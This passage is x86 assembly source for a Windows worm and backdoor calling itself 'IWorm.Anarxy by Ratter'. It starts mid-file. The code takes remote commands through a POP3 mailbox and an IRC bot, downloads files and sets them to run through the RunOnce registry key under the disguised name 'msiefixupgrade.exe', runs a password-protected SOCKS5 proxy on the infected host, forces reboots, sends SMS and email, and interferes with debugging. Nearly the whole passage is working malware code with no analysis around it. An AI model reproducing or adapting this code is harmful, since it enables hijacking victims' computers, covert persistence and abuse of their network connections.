EWX_REBOOT or EWX_FORCE call ExitWindowsEx push 0 push EWX_FORCE call ExitWindowsEx jmp exit_program reboot_command_end: retn Create_Thread: @pushvar
push 0 push 0 push eax push 8192 push 0 call CreateThread retn heap_alloc: push eax push HEAP_ZERO_MEMORY push dword ptr [heap_handle] call HeapAlloc retn heap_free: pop edi push 0 push dword ptr [heap_handle] call HeapFree jmp edi ; in: esi - sms message ; ebx - _email_ struc sms_send proc local sms_parts:DWORD local sms_mail:DWORD mov dword ptr [sms_mail], ebx mov eax, 1000 call heap_alloc xchg eax, edi mov eax, 200 call heap_alloc xchg eax, ebx push edi @copysz pop edi mov esi, dword ptr [sms_max] call split_string mov dword ptr [sms_parts], edx mov ecx, edx xor edx, edx mov esi, edi inc edx sms_send_loop: push edi mov edi, ebx mov al, '[' stosb mov eax, edx call _convert_num_ mov al, '/' stosb mov eax, dword ptr [sms_parts] call _convert_num_ mov al, ']' stosb mov al, 20h stosb @copysz pop edi pushad mov esi, dword ptr [sms_mail] mov dword ptr [esi.EM_Message], ebx call send_mail popad jc sms_send_end inc edx pushad mov eax, 500 call online_sleep popad jc sms_send_end loop sms_send_loop clc sms_send_end: pushfd push edi call heap_free push ebx call heap_free popfd leave retn sms_send endp split_string: pushad mov ebx, edi mov ebp, edi xor eax, eax cdq mov ecx, eax split_string_loop: .if byte ptr [edi] == 20h mov ebx, edi .endif cmp byte ptr [edi], 0 jz split_string_end inc ecx inc edi cmp ecx, esi jc split_string_loop mov ecx, eax .if ebx == ebp mov ebx, edi .endif mov edi, ebx and byte ptr [edi], 0 inc edi inc ebx inc edx mov ebp, ebx jmp split_string_loop split_string_end: inc edx mov dword ptr [esp.Pushad_edx], edx popad retn _convert_num_: pushad xor edx, edx push 10 pop ecx call convert_num add edi, ebx mov dword ptr [esp.Pushad_edi], edi popad retn setup_sms: xor eax, eax call is_user_allowed jc setup_sms_end call go_over_gapz jc setup_sms_end mov esi, edi call ascii_to_num mov dword ptr [sms_max], eax clc setup_sms_end: retn upgrade_command: sub esp, 300 mov esi, esp push 300 push esi @pushsz "%windir%\system\msiefixupgrade.exe" call ExpandEnvironmentStringsA push 1 pop eax push esi call is_user_allowed pop esi jc upgrade_command_end_error call go_over_gapz jc upgrade_command_end_error call internet_read_file test ecx, ecx jz upgrade_command_end_error xor eax, eax @pushvar
@pushvar <_key_handle dd ?> push eax push KEY_QUERY_VALUE or KEY_SET_VALUE push eax push eax push eax @pushsz "Software\Microsoft\Windows\CurrentVersion\RunOnce" push HKEY_LOCAL_MACHINE call RegCreateKeyExA test eax, eax jnz upgrade_command_end_error push esi call lstrlen push eax push esi push REG_SZ push 0 @pushsz "MSIEFixUpgrade" mov ebx, dword ptr [_key_handle] push ebx call RegSetValueExA push ebx call RegCloseKey call leave_command clc jmp upgrade_command_end_error+1 upgrade_command_end_error: stc lahf add esp, 300 sahf retn dl_file_command: push 1 pop eax call is_user_allowed jc dl_file_command_end call go_over_gapz jc dl_file_command_end push edi call file_name_only pop edi xchg eax, esi sub esp, 8 mov ebx, esp mov dword ptr [ebx], esi mov dword ptr [ebx+4], edi @pushvar
push 0 push ebx push offset dl_file_thread push 8192 push 0 call CreateThread mov ebx, eax test eax, eax jnz dl_file_command_allz_ok add esp, 8 jmp dl_file_command_end_error dl_file_command_allz_ok: push 10000 push ebx call WaitForSingleObject inc eax jz dl_file_command_end_ cmp eax, WAIT_TIMEOUT jz dl_file_command_end_ sub esp, 4 push esp push ebx call GetExitCodeThread mov eax, dword ptr [esp] add esp, 4 dl_file_command_end_: push eax push ebx call CloseHandle pop eax add esp, 8 test eax, eax jz dl_file_command_end_error clc jmp dl_file_command_end_error+1 dl_file_command_end_error: stc dl_file_command_end: retn dl_file_thread proc argz:DWORD mov eax, dword ptr [argz] mov esi, dword ptr [ebx] mov edi, dword ptr [ebx+4] call internet_read_file leave push ecx call ExitThread dl_file_thread endp ; in: edi - internet resource address (FTP or HTTP) ; esi - file_name to store to internet_read_file proc local internet_handle:DWORD local internet_resource:DWORD local bytes_avail:DWORD local file_handle:DWORD local bytes_read_:DWORD pushad xor eax, eax push eax push eax push CREATE_ALWAYS push eax push FILE_SHARE_READ push GENERIC_WRITE push esi call CreateFileA inc eax xchg eax, ecx test ecx, ecx jz internet_read_file_end_error_ dec ecx mov dword ptr [file_handle], ecx xor eax, eax push eax push eax push eax push INTERNET_OPEN_TYPE_DIRECT @pushsz "IWorm.Anarxy by Ratter" call InternetOpenA xchg eax, ecx test ecx, ecx jz internet_read_file_end_error_ mov dword ptr [internet_handle], ecx xor eax, eax push eax push eax push eax push eax push edi push dword ptr [internet_handle] call InternetOpenUrlA xchg eax, ecx jecxz internet_read_file_end_close mov dword ptr [internet_resource], ecx mov eax, 64000 call heap_alloc xchg eax, ebx internet_read_file_loop: lea edx, [bytes_avail] xor eax, eax push eax push eax push edx push dword ptr [internet_resource] call InternetQueryDataAvailable xchg eax, ecx jecxz internet_read_file_end_close_ mov edx, dword ptr [bytes_avail] cmp edx, 64000 jbe internet_read_file_ mov edx, 64000 internet_read_file_: lea eax, [bytes_read_] push eax push edx push ebx push dword ptr [internet_resource] call InternetReadFile xchg eax, ecx jecxz internet_read_file_end_close_ mov ecx, dword ptr [bytes_read_] jecxz internet_read_file_done push 0 @pushvar
push ecx push ebx push dword ptr [file_handle] call WriteFile xchg eax, ecx jecxz internet_read_file_end_close_ jmp internet_read_file_loop internet_read_file_done: push 1 pop ecx internet_read_file_end_close_: push ecx push ebx call heap_free push dword ptr [internet_resource] call InternetCloseHandle pop ecx internet_read_file_end_close: push ecx push dword ptr [internet_handle] call InternetCloseHandle pop ecx internet_read_file_end_error: push ecx push dword ptr [file_handle] call CloseHandle pop ecx internet_read_file_end_error_: mov dword ptr [esp.Pushad_ecx], ecx popad leave retn internet_read_file endp add_oper_command: push 1 pop eax call is_user_allowed jc add_oper_command_end call go_over_gapz jc add_oper_command_end push dword ptr [msg_from] mov dword ptr [msg_from], edi xor eax, eax call go_until_gap jc add_oper_command_go_on stosb call go_over_gapz jc add_oper_command_go_on mov esi, edi call ascii_to_num add_oper_command_go_on: push eax push 1 pop eax call is_user_allowed pop eax jnc add_oper_command_end_ call add_oper add_oper_command_end_: pop dword ptr [msg_from] jmp add_oper_command_end+1 add_oper_command_end: stc retn remove_oper_command: push 1 pop eax call is_user_allowed jc remove_oper_command_end call go_over_gapz jc remove_oper_command_end push dword ptr [msg_from] mov dword ptr [msg_from], edi call remove_oper pop dword ptr [msg_from] remove_oper_command_end: retn list_operz_command: xor eax, eax call is_user_allowed jc list_operz_command_end call message_for_who mov dword ptr [recipient], eax lea esi, dword ptr [operz] lodsd xchg eax, ecx jecxz list_operz_command_end list_operz_loop: lodsd test eax, eax jz list_operz_loop_ inc eax jz list_operz_command_ok dec eax mov dword ptr [privmsg_what], eax pushad lea esi, [privmsg_msg] call send_message popad mov eax, 200 call online_sleep jc list_operz_command_end list_operz_loop_: inc esi dec ecx jnz list_operz_loop list_operz_command_ok: clc jmp list_operz_command_end+1 list_operz_command_end: stc retn msg_box_command: push 1 pop eax call is_user_allowed jc remove_oper_command_end call go_over_gapz mov esi, edi call ascii_to_num xchg eax, edx mov edi, esi call parse_string_ jc msg_box_command_end mov esi, eax call parse_string_ jc msg_box_command_end mov ebx, eax push 0 push esi push ebx push edx call MessageBoxA msg_box_command_end: retn anti_debug proc local _context_:CONTEXT call GetCurrentThread lea esi, [_context_] push eax mov dword ptr [esi.CONTEXT_ContextFlags], CONTEXT_FULL or \ CONTEXT_DEBUG_REGISTERS push esi push eax call GetThreadContext or dword ptr [esi.CONTEXT_Dr7], 10000000000000b pop eax mov dword ptr [esi.CONTEXT_ContextFlags], CONTEXT_DEBUG_REGISTERS push esi push eax call SetThreadContext leave retn anti_debug endp pop3_gateway proc local pop3_sin_:sockaddr_in local pop3_counter:DWORD local pop3_messagez:DWORD local pop3_message_size:DWORD local pop3_temp:DWORD local pop3_buffer:DWORD local pop3_message_text:DWORD local pop3_email_flagz:DWORD local pop3_email:_email_ local pop3_return_path:_temp_buffer_ local pop3_boundary:_temp_buffer_ @SEH_SetupFrame mov dword ptr [is_user_allowed], offset pop3_user_allowed mov dword ptr [send_message], offset pop3_send_message mov dword ptr [message_for_who], offset pop3_message_for_who mov dword ptr [smtp_timeout], INFINITE call get_local_host push 100 pop eax call heap_alloc xchg eax, edi mov dword ptr [pop3_buffer], edi pop3_gateway_main_loop: push -5 pop dword ptr [pop3_counter] pop3_gateway_main_loop_: cmp dword ptr [online_flag], 1 jnz pop3_gateway_end_counter push 1000 push dword ptr [pop3_buffer] push HEAP_ZERO_MEMORY push dword ptr [heap_handle] call HeapReAlloc xchg eax, edi mov dword ptr [pop3_buffer], edi push 0 push SOCK_STREAM push AF_INET call socket inc eax jz pop3_gateway_exit dec eax mov dword ptr [pop3_handle], eax mov esi, offset pop3_server call get_hostent jz pop3_gateway_end_counter push edi lea edi, [pop3_sin_] push POP3_PORT pop ebx call update_sin pop edi lea eax, [pop3_sin_] push type(sockaddr_in) push eax push dword ptr [pop3_handle] call connect test eax, eax jnz pop3_gateway_end_counter call pop3_get_response cmp eax, OK jnz pop3_gateway_end_counter ; nowa in AUTHORIZATION state lea esi, [pop3_user] call pop3_send_command jnz pop3_gateway_end_counter lea esi, [pop3_password] call pop3_send_command jnz pop3_gateway_end_counter ; nowa in TRANSACTION state ;C: STAT ;S: +OK 2 320 lea esi, pop3_stat call pop3_send_command jnz pop3_emailz_end add edi, 4 call go_over_gapz mov esi, edi call ascii_to_num cmp eax, 9999 ja pop3_delete_whole_email_box test eax, eax jz pop3_emailz_end mov dword ptr [pop3_messagez], eax pop3_emailz_main_loop: mov eax, dword ptr [pop3_messagez] push dword ptr [pop3_buffer] lea edi, [email_message_buffer] call _convert_num_ xor eax, eax stosb pop edi ;C: LIST 2 ;S: +OK 2 200 lea esi, [pop3_list] call pop3_send_command jnz pop3_emailz_end add edi, 4 call go_over_gapz call go_until_gap call go_over_gapz mov esi, edi call ascii_to_num mov dword ptr [pop3_message_size], eax mov dword ptr [find_string_ecx], eax add eax, 100 push eax push dword ptr [pop3_buffer] push HEAP_ZERO_MEMORY push dword ptr [heap_handle] call HeapReAlloc test eax, eax jnz pop3_heap_realloc_valid mov edi, dword ptr [pop3_buffer] jmp pop3_delete_message pop3_heap_realloc_valid: xchg eax, edi mov dword ptr [pop3_buffer], edi ;TOP 1 lea esi, [pop3_top] call pop3_send_command jnz pop3_delete_message push 0 push 10000 ; recieve header + 1st line push edi push dword ptr [pop3_handle] call recv call lookup_email_header jc pop3_delete_message call pop3_check_password ; is first word password? jc pop3_delete_message lea esi, [pop3_retr] call pop3_send_command jnz pop3_delete_message ; ok now ready to retrieve the whole email_message call pop3_retrieve_message jc pop3_delete_message ; ... call pop3_do_message IFDEF del_emailz cmp eax, ERROR jz pop3_delete_message test dword ptr [pop3_email_flagz], DELETE_FORBIDDEN ; can we delete the msg? jnz pop3_next_message_in_box pop3_delete_message: lea esi, [pop3_dele] call pop3_send_command jnz pop3_emailz_end ENDIF IFNDEF del_emailz pop3_delete_message: ENDIF pop3_next_message_in_box: dec dword ptr [pop3_messagez] jnz pop3_emailz_main_loop pop3_emailz_end: lea esi, [quit] call write_socket ; nowa in UPDATE state push dword ptr [pop3_handle] call closesocket mov eax, 3*60000 call online_sleep jc pop3_gateway_exit jmp pop3_gateway_main_loop pop3_gateway_end_counter: push dword ptr [pop3_handle] call closesocket cmp dword ptr [online_flag], 1 jnz pop3_gateway_exit inc dword ptr [pop3_counter] jz pop3_gateway_run_ircbot mov eax, 1*60000 call online_sleep jc pop3_gateway_exit jmp pop3_gateway_main_loop_ pop3_gateway_run_ircbot: call ircbot_run_command pop3_gateway_exit: push dword ptr [pop3_buffer] call heap_free @SEH_RemoveFrame leave push 0 call ExitThread pop3_delete_whole_email_box: xchg eax, ecx push 1 pop eax call delete_messagez jmp pop3_emailz_end pop3_gateway endp ircbot_run_command: cmp dword ptr [online_flag], 1 stc jnz ircbot_run_command_end+1 mov dword ptr [is_user_allowed], offset _is_user_allowed_ mov dword ptr [send_message], offset _send_message_ mov dword ptr [message_for_who], offset _message_for_who_ mov dword ptr [smtp_timeout], 60000 mov eax, offset ircbot_thread call Create_Thread xchg dword ptr [inet_threadz], eax push eax push INFINITE push dword ptr [inet_threadz] call WaitForSingleObject pop eax xchg dword ptr [inet_threadz], eax push eax call CloseHandle mov dword ptr [is_user_allowed], offset pop3_user_allowed mov dword ptr [send_message], offset pop3_send_message mov dword ptr [message_for_who], offset pop3_message_for_who mov dword ptr [smtp_timeout], INFINITE ircbot_run_command_end: clc retn del_emailz_command: call go_over_gapz mov esi, edi call ascii_to_num mov edi, esi push eax call go_over_gapz mov esi, edi call ascii_to_num xchg ecx, eax pop eax call delete_messagez retn save_email_filez_command: pushad call go_over_gapz mov esi, edi call ascii_to_num mov dword ptr [save_email_filez_looping], eax mov eax, dword ptr [pop3_message_size] call heap_alloc xchg eax, esi mov edi, dword ptr [pop3_message_text] save_email_filez_command_loop: dec dword ptr [save_email_filez_looping] push esi lea esi, [pop3_boundary] call find_string mov edi, ebx lea esi, [pop3_name] call find_string mov edi, ebx call go_until_gap and byte ptr [edi-1], 0 call pop3_find_2x_CR_LF call go_over_all_gapz pop esi xchg esi, edi call base64_decode xchg esi, edi push eax xor eax, eax push eax push eax push CREATE_ALWAYS push eax push FILE_SHARE_READ push GENERIC_WRITE push ebx call CreateFileA pop edx inc eax jz save_email_filez_command_error dec eax xchg eax, ebx push 0 @pushvar
push edx push esi push ebx call WriteFile push ebx call CloseHandle mov ecx, 12345678h save_email_filez_looping equ $-4 clc jecxz save_email_filez_command_error+1 jmp save_email_filez_command_loop save_email_filez_command_error: stc pushfd push esi call heap_free popfd popad retn pop3_user_allowed: clc retn pop3_message_for_who: and dword ptr [to_flag], 0 retn pop3_send_message: push esi push edi mov esi, dword ptr [privmsg_what] mov edi, 12345678h pop3_send_message_buffer equ $-4 @copysz mov dword ptr [edi-1], ' ;' inc edi mov dword ptr [pop3_send_message_buffer], edi pop edi pop esi retn ; out: eax - "-ER" or not "-ER" :) pop3_do_message: pushad mov eax, 3000 call heap_alloc mov dword ptr [pop3_temp], eax mov dword ptr [pop3_send_message_buffer], eax xchg eax, ebx xor eax, eax lea edi, [pop3_email] lea ecx, [pop3_return_path] mov dword ptr [edi.EM_MailFrom], offset pop3_email_addr mov dword ptr [edi.EM_RcptTo], ecx mov dword ptr [edi.EM_Subject], eax mov dword ptr [edi.EM_FilezNum], eax call pop3_do_message_ jnc pop3_do_message_all_iz_ok mov dword ptr [ebx], "RE-" pop3_do_message_all_iz_ok: mov dword ptr [edi.EM_Message], ebx mov eax, dword ptr [ebx] mov dword ptr [esp.Pushad_eax], eax test dword ptr [pop3_email_flagz], 1 jnz pop3_do_message_send_sms mov esi, edi call send_mail jmp pop3_do_message_end pop3_do_message_send_sms: xchg esi, ebx mov ebx, edi call sms_send pop3_do_message_end: push dword ptr [pop3_temp] call heap_free popad retn ; out: Cflag - false|true pop3_do_message_: pushad mov eax, 500 call heap_alloc xchg ebx, eax mov edi, dword ptr [pop3_message_text] call go_until_gap ; first is password call go_over_all_gapz mov esi, edi call ascii_to_num ; second are flagz mov dword ptr [pop3_email_flagz], eax mov edi, esi pop3_do_message_main_loop: call go_over_all_gapz mov esi, edi mov edi, ebx pop3_do_message_command_loop: lodsb cmp al, ';' jz pop3_do_message_got_command cmp al, 20h jc pop3_do_message_command_loop stosb jmp pop3_do_message_command_loop pop3_do_message_got_command: xor eax, eax stosb mov edi, esi cmp dword ptr [ebx], "dne!" jz pop3_do_message_allz_ok mov dword ptr [msg_paramz], ebx push edi mov edi, dword ptr [pop3_send_message_buffer] inc dword ptr [pop3_send_message_buffer] mov word ptr [edi], '[' pop edi pushad call privmsg_fc popad push edi mov edi, dword ptr [pop3_send_message_buffer] inc dword ptr [pop3_send_message_buffer] mov word ptr [edi], ']' pop edi jmp pop3_do_message_main_loop pop3_do_message_allz_ok: clc jmp pop3_do_message_end_error+1 pop3_do_message_end_error: stc pushfd push ebx call heap_free popfd popad retn ; in: edi - email ; out: edi - email_text go_over_email_header: pushad call pop3_find_2x_CR_LF cmp dword ptr [pop3_boundary], 0 jz go_over_email_header_end lea esi, [pop3_boundary] call find_string xchg ebx, edi call pop3_find_2x_CR_LF go_over_email_header_end: call go_over_all_gapz mov dword ptr [esp.Pushad_edi], edi mov dword ptr [pop3_message_text], edi popad retn ; in: edi - message header (end - 2xCR_LF) lookup_email_header: pushad lea esi, [return_path] call find_string jc lookup_email_header_end push edi xchg edi, ebx call go_over_gapz cmp byte ptr [edi], "<" jnz $+3 inc edi mov ebx, edi call go_until_gap cmp byte ptr [edi-1], ">" jnz $+3 dec edi and byte ptr [edi], 0 lea eax, [pop3_return_path] push ebx push eax call lstrcpy pop edi and dword ptr [pop3_boundary], 0 lea esi, [boundary] call find_string jc lookup_email_header_end_ mov edi, ebx call go_until_gap and byte ptr [edi-1], 0 lea eax, [pop3_boundary] push ebx push eax call lstrcpy lookup_email_header_end_: clc lookup_email_header_end: popad retn ; in: esi - string to search ; edi - where to search ; out: Cflag - true|false ; ebx - the first byte after founded string find_string: pushad push esi mov ebx, esi @endsz dec esi sub esi, ebx xchg esi, edx pop esi lodsb dec edx jz find_string_end_error mov ecx, 12345678h find_string_ecx equ $-4 find_string_main_loop: jecxz find_string_end_error repnz scasb jnz find_string_main_loop push edi push esi push ecx mov ecx, edx repz cmpsb pop ecx pop esi pop ebx jz find_string_found xchg ebx, edi jmp find_string_main_loop find_string_found: clc mov dword ptr [esp.Pushad_ebx], edi jmp find_string_end_error+1 find_string_end_error: stc popad retn pop3_retrieve_message: push edi mov ebx, dword ptr [pop3_message_size] pop3_retrieve_message_loop: cmp dword ptr [online_flag], 1 jnz pop3_retrieve_message_end_error push 0 push 2000 push edi push dword ptr [pop3_handle] call recv inc eax jz pop3_retrieve_message_end_error dec eax xchg eax, ecx jecxz pop3_retrieve_message_end add edi, ecx sub ebx, ecx jnc pop3_retrieve_message_loop pop3_retrieve_message_end: clc jmp pop3_retrieve_message_end_error+1 pop3_retrieve_message_end_error: stc pop edi retn pop3_check_password: push edi call go_over_email_header cmp byte ptr [edi], '!' jnz pop3_check_password_end_error inc edi mov esi, edi call go_until_gap mov eax, esi sub edi, eax push edi call gimme_CRC32 cmp eax, dword ptr [bot_password] jnz pop3_check_password_end_error clc jmp pop3_check_password_end_error+1 pop3_check_password_end_error: stc pop edi retn pop3_find_2x_CR_LF: mov al, 0ah mov ecx, 12345678h pop3_CR_LF_loop: repnz scasb jnz pop3_check_password_end_error cmp word ptr [edi], CR_LF jnz pop3_CR_LF_loop retn ; in: esi - command_string possibly with replacementz pop3_send_command: push edi push 1000 pop eax call heap_alloc mov dword ptr [temp_buffer], eax mov eax, 10000 call heap_alloc xchg eax, edi push edi call find_replacementz mov eax, CR_LF stosw pop esi sub edi, esi push 0 push edi push esi push dword ptr [pop3_handle] call send push esi call heap_free push dword ptr [temp_buffer] call heap_free pop edi and dword ptr [edi], 0 push edi pop3_send_command_loop: push 0 push 1 push edi push dword ptr [pop3_handle] call recv cmp eax, 1 jnz pop3_send_command_end inc edi cmp byte ptr [edi-1], 0ah jnz pop3_send_command_loop pop3_send_command_end: pop edi mov eax, dword ptr [edi] and eax, 0ffffffh cmp eax, OK retn online_sleep: push ebx xchg eax, ebx online_sleep_loop: cmp dword ptr [online_flag], 1 jz online_sleep_go_on stc jmp online_sleep_end online_sleep_go_on: push 100 call Sleep sub ebx, 100 jnz online_sleep_loop clc online_sleep_end: pop ebx retn pop3_get_response proc local response:DWORD local response_:DWORD push 0 push 4 lea eax, [response] push eax push dword ptr [pop3_handle] call recv cmp eax, 4 jnz pop3_get_response_end_error pop3_get_response_loop: push 0 push 1 lea eax, [response_] push eax push dword ptr [pop3_handle] call recv cmp eax, 1 jnz pop3_get_response_end_error cmp byte ptr [response_], 0ah jnz pop3_get_response_loop clc jmp pop3_get_response_end_error+1 pop3_get_response_end_error: stc mov eax, dword ptr [response] and eax, 0ffffffh leave retn pop3_get_response endp ; in: eax - message number to start with ; ecx - how much messages from message[eax] to delete delete_messagez: push ecx push eax lea edi, [email_message_buffer] call _convert_num_ xor eax, eax stosb lea esi, [pop3_dele] call pop3_send_command pop eax pop ecx stc jnz delete_messagez_error inc eax loop delete_messagez clc delete_messagez_error: retn ; in: ecx - Key ; edx - SubKey ; ebx - ValueType (REG_SZ, REG_DWORD only!) ; edi - ValueName ; esi - DataToStore reg_set_value: pushad xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE or KEY_SET_VALUE push eax push eax push eax push edx push ecx call RegCreateKeyExA test eax, eax jnz reg_set_value_end mov eax, ebx cmp ebx, REG_SZ jnz reg_set_value_next push esi call lstrlen reg_set_value_next: push eax push esi push ebx push 0 push edi mov ebx, dword ptr [reg_key_handle] push ebx call RegSetValueExA push eax push ebx call RegCloseKey pop eax reg_set_value_end: test eax, eax mov dword ptr [esp.Pushad_eax], eax popad retn ; in: ecx - Key ; edx - SubKey ; ebx - MaxBufferSize ; edi - ValueName ; esi - Buffer reg_query_value: pushad xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE or KEY_SET_VALUE push eax push eax push eax push edx push ecx call RegCreateKeyExA test eax, eax jnz reg_query_value_end mov dword ptr [lpcbData], ebx @pushvar push esi @pushvar
push 0 push edi mov ebx, dword ptr [reg_query_key_handle] push ebx call RegQueryValueExA push eax push ebx call RegCloseKey pop eax reg_query_value_end: test eax, eax mov dword ptr [esp.Pushad_eax], eax popad retn ; in: ecx - Key ; edx - SubKey ; edi - ValueName reg_delete_value: pushad xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE or KEY_SET_VALUE push eax push eax push eax push edx push ecx call RegCreateKeyExA test eax, eax jnz reg_delete_value_end push edi mov ebx, dword ptr [reg_delete_value_handle] push ebx call RegDeleteValueA push eax push ebx call RegCloseKey pop eax reg_delete_value_end: test eax, eax mov dword ptr [esp.Pushad_eax], eax popad retn ; in: ecx - Key ; ebx - SubKey reg_delete_key: pushad xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE or KEY_SET_VALUE push eax push eax push eax @pushsz "" push ecx call RegCreateKeyExA test eax, eax jnz reg_delete_key_end push ebx mov ebx, dword ptr [reg_delete_key_handle] push ebx call RegDeleteKeyA push eax push ebx call RegCloseKey pop eax reg_delete_key_end: test eax, eax mov dword ptr [esp.Pushad_eax], eax popad retn delete_registry_: call delete_registry lea ebx, [hu_subkey] mov ecx, HKEY_USERS call reg_delete_key retn delete_registry: mov dword ptr [registry_fc], offset reg_delete_value jmp registry query_registry: mov dword ptr [registry_fc], offset reg_query_value jmp registry set_default_settingz: lea esi, [default_settingz] set_registry: mov dword ptr [registry_fc], offset reg_set_value ; in: esi - RegistryStructure registry: pushad lodsd xchg eax, ecx lodsd xchg eax, edx lodsd xchg eax, ebp registry_loop: push ecx push edx lodsd xchg eax, ebx lodsd xchg eax, edi lodsd push esi xchg eax, esi mov eax, 12345678h registry_fc equ $-4 call eax pop esi pop edx pop ecx test eax, eax jnz registry_end dec ebp jnz registry_loop registry_end: test eax, eax mov dword ptr [esp.Pushad_eax], eax popad retn soxz_proxy proc local soxz_socket:DWORD local soxz_sin:sockaddr_in local soxz_conn_port:DWORD local soxz_server_sock:DWORD local soxz_cur_sock:DWORD local soxz_fds:fd_set local soxz_time_out:timeval @SEH_SetupFrame soxz_proxy_main_loop: cmp dword ptr [online_flag], 1 jnz soxz_proxy_main_end mov eax, 2000 call heap_alloc xchg eax, edi push 0 push SOCK_STREAM push AF_INET call socket inc eax jz soxz_proxy_end dec eax mov dword ptr [soxz_socket], eax mov dword ptr [soxz_sin.sin_family], AF_INET xor eax, eax push edi lea edi, [soxz_sin.sin_zero] stosd stosd mov dword ptr [soxz_sin.sin_addr], eax pop edi push SOXZ_PORT call htons mov word ptr [soxz_sin.sin_port], ax lea eax, [soxz_sin] push type(sockaddr_in) push eax push dword ptr [soxz_socket] call bind test eax, eax jnz soxz_proxy_end_close_socket push 3 push dword ptr [soxz_socket] call listen test eax, eax jnz soxz_proxy_end_close_socket push eax push eax push dword ptr [soxz_socket] call accept xchg eax, esi mov ecx, dword ptr [soxz_proxy_fcz] xor edx, edx soxz_proxy_aut_loop: push ecx push edx call read_socket_soxz jz soxz_proxy_end_close_socket_ pop edx pushad call dword ptr [soxz_proxy_fcz+4+edx*4] mov dword ptr [esp.Pushad_eax], eax popad jc soxz_proxy_end_close_socket_ push edx call write_socket_soxz pop edx jz soxz_proxy_end_close_socket_ pop ecx inc edx loop soxz_proxy_aut_loop mov eax, dword ptr [soxz_server_sock] mov dword ptr [soxz_cur_sock], eax soxz_main_read_loop: cmp dword ptr [online_flag], 1 jnz soxz_proxy_end_close_socket__ lea ecx, [soxz_time_out] mov dword ptr [ecx.tv_sec], 0 mov dword ptr [ecx.tv_usec], 500 lea ebx, [soxz_fds] mov dword ptr [ebx.fd_count], 1 push esi pop dword ptr [ebx.fd_array] xor eax, eax push ecx push eax push eax push ebx push eax call select xchg eax, ecx jecxz soxz_main_read_loop_timeout inc ecx jz soxz_proxy_end_close_socket__ call read_socket_soxz test eax, eax jz soxz_proxy_end_close_socket__ inc eax jz soxz_proxy_end_close_socket__ dec eax xchg esi, dword ptr [soxz_cur_sock] call write_socket_soxz test eax, eax jz soxz_proxy_end_close_socket__ inc eax jz soxz_proxy_end_close_socket__ dec eax mov eax, 200 call online_sleep jc soxz_proxy_end_close_socket__ jmp soxz_main_read_loop soxz_main_read_loop_timeout: mov eax, 200 call online_sleep jc soxz_proxy_end_close_socket__ xchg esi, dword ptr [soxz_cur_sock] jmp soxz_main_read_loop soxz_proxy_end_close_socket__: push dword ptr [soxz_cur_sock] call closesocket soxz_proxy_end_close_socket_: push esi call closesocket soxz_proxy_end_close_socket: push dword ptr [soxz_socket] call closesocket soxz_proxy_end: push edi call heap_free cmp dword ptr [online_flag], 1 jnz soxz_proxy_main_end jmp soxz_proxy_main_loop soxz_proxy_main_end: @SEH_RemoveFrame push 0 call ExitThread soxz_proxy endp read_socket_soxz: push 0 push 2000 push edi push esi call recv test eax, eax retn write_socket_soxz: push 0 push eax push edi push esi call send test eax, eax retn soxz_method: cmp byte ptr [edi], 05h jnz soxz_end_error push edi inc edi xor ecx, ecx mov cl, byte ptr [edi] push 02h pop eax inc edi repnz scasb pop edi jnz soxz_end_error mov byte ptr [edi+1], 02h push 2 pop eax clc retn soxz_end_error: stc retn soxz_authentization: cmp byte ptr [edi], 1 jnz soxz_end_error mov ebx, edi inc edi inc edi movzx edx, byte ptr [edi-1] mov esi, edi push edx call gimme_CRC32 add edi, edx cmp eax, 0ab4ee342h ; username Ratter jnz soxz_end_error inc edi movzx edx, byte ptr [edi-1] mov esi, edi push edx call gimme_CRC32 add edi, edx cmp eax, dword ptr [bot_password] jnz soxz_end_error mov byte ptr [ebx], 01h and byte ptr [ebx+1], 0 push 2 pop eax clc retn soxz_make_proxy: cmp byte ptr [edi], 5 jnz soxz_end_error cmp byte ptr [edi+2], 0 jnz soxz_end_error test byte ptr [edi+3], 03h jz soxz_end_error movzx ecx, byte ptr [edi+4] lea esi, [edi+5] movzx ebx, word ptr [edi+ecx+5] xchg bl, bh and byte ptr [edi+ecx+5], 0 push ebx call get_hostent pop ebx jz soxz_end_error push edi lea edi, [soxz_sin] call update_sin pop edi movzx eax, byte ptr [edi+1] dec eax call dword ptr [soxz_commandz+eax*4] jc soxz_end_error mov dword ptr [edi], 01000005h push ecx add edi, 5 push edi call get_local_host push dword ptr [local_host_ip] call ntohl push eax call inet_ntoa pop edi mov edx, edi push edi @copy eax pop edi @endsz_ sub edi, edx xchg edi, edx dec edx mov byte ptr [edi-1], dl add edi, edx pop ecx jecxz soxz_make_proxy_generate_port xchg cl, ch mov word ptr [edi], cx inc edi inc edi jmp soxz_make_proxy_end soxz_make_proxy_generate_port: mov ebx, 3976 push edx call get_random pop edx add eax, 1024 mov dword ptr [soxz_conn_port], eax xchg al, ah stosw soxz_make_proxy_end: mov eax, edx add eax, 7 clc retn soxz_make_connect: push 0 push SOCK_STREAM push AF_INET call socket inc eax jz soxz_make_connect_end_error dec eax mov dword ptr [soxz_server_sock], eax lea eax, [soxz_sin] push type(sockaddr_in) push eax push dword ptr [soxz_server_sock] call connect test eax, eax jnz soxz_make_connect_end_close_socket mov ecx, SOXZ_PORT clc jmp soxz_make_connect_end_error+1 soxz_make_connect_end_close_socket: push dword ptr [soxz_server_sock] call closesocket soxz_make_connect_end_error: stc retn soxz_error: stc retn setup_pop3_command: push 1 pop eax call is_user_allowed jc setup_pop3_end call go_over_gapz jc setup_sms_end call $+25 dd 4 dd offset pop3_email_addr dd offset pop3_server dd offset pop3_user_ dd offset pop3_password_ pop ebx mov ecx, dword ptr [ebx] add ebx, 4 setup_pop3_command_loop: xchg esi, edi mov edi, dword ptr [ebx] call move_until_gap xchg esi, edi call go_over_gapz jc setup_pop3_command_set_registry add ebx, 4 loop setup_pop3_command_loop setup_pop3_command_set_registry: call set_default_settingz clc setup_pop3_end: retn end start ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ANARXY.ASM]ÄÄÄ 